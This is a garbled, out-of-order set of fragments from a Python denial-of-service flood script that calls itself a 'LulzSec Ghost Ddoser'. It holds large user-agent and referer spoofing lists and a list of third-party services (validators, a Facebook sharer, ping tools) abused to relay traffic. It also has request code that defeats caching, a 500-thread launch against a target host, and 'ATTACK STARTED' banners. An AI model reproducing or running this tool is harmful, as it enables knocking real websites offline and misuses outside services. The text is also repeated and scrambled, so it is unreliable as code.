(Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48')", "<____|.----|| .---''---, The ;..__..' _... 
Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/", "U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile", "rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML,", "10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,", "keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air')", "accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)')", "Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot')", "(X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE", "<EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 
(MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')", "U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows;", "like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181", "HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia", "headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara", "Ghost' print \"\\a\" print \\ \"\"\" . 
_____|\\ _.--| LOL |: <____|.----|| .---''---,", "sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)==", "code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10))", "headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates", "keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') 
keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le", "MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows;", "| / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O", "headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)')", "generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World", "headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0')", "(Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0;", "usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8", "headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') 
headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575')", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36", "your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider;", ": | \\ \\ / / :_| ;`-._; __..--'; : : / (", "PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model", "6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows;", "Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop", "Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi", "Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') 
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x", "(aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')", "at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1", "headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31", "miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja", "<url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec", "generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "(Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac", "// // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // 
~~ _//", "headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0", "(http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U;", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS", "headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') 
headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43)", "\\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\ /-._; |", "robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0", "try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print", "dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c", "4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "(GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink", "# monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while", "len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script", "+ '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") 
bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT')", "Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita", "(KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') #", "bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux;", "engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)')", "keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/')", "request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError,", "The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / |", "request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~'", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19", "headers_useragents.append('GSiteCrawler/v1.06 rev. 
251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2;", "4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", "except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread", "Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4", "(compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "(Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;')", "keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch')", "Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1", "/`-._| | | || ' : `.`.) 
_,' |;._:: | | | |", "= re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread()", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')", "<EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami", "param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')", "EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com", "headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12", "(compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')", "#global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter", "headers_useragents.append('Mozilla/5.0 (Linux; Android 
4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia", "// // ~~ _// _// _// ~ _// ~ ~ / / /", "2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada", "rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30", "\"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\"", "headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi", "headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') 
headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=')", "NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0;", "X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64;", "ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0", "libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0')", "print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e:", "(PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like", 
"httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url +", "def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')", "\\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\ /-._;", "; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)')", "headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,", ":: /`-._| | | || ' : `.`.) 
_,' |;._:: | | |", "(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR", "/ / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def", "// // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _//", "(Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0", "(Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')", "3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64;", "LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----||", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 
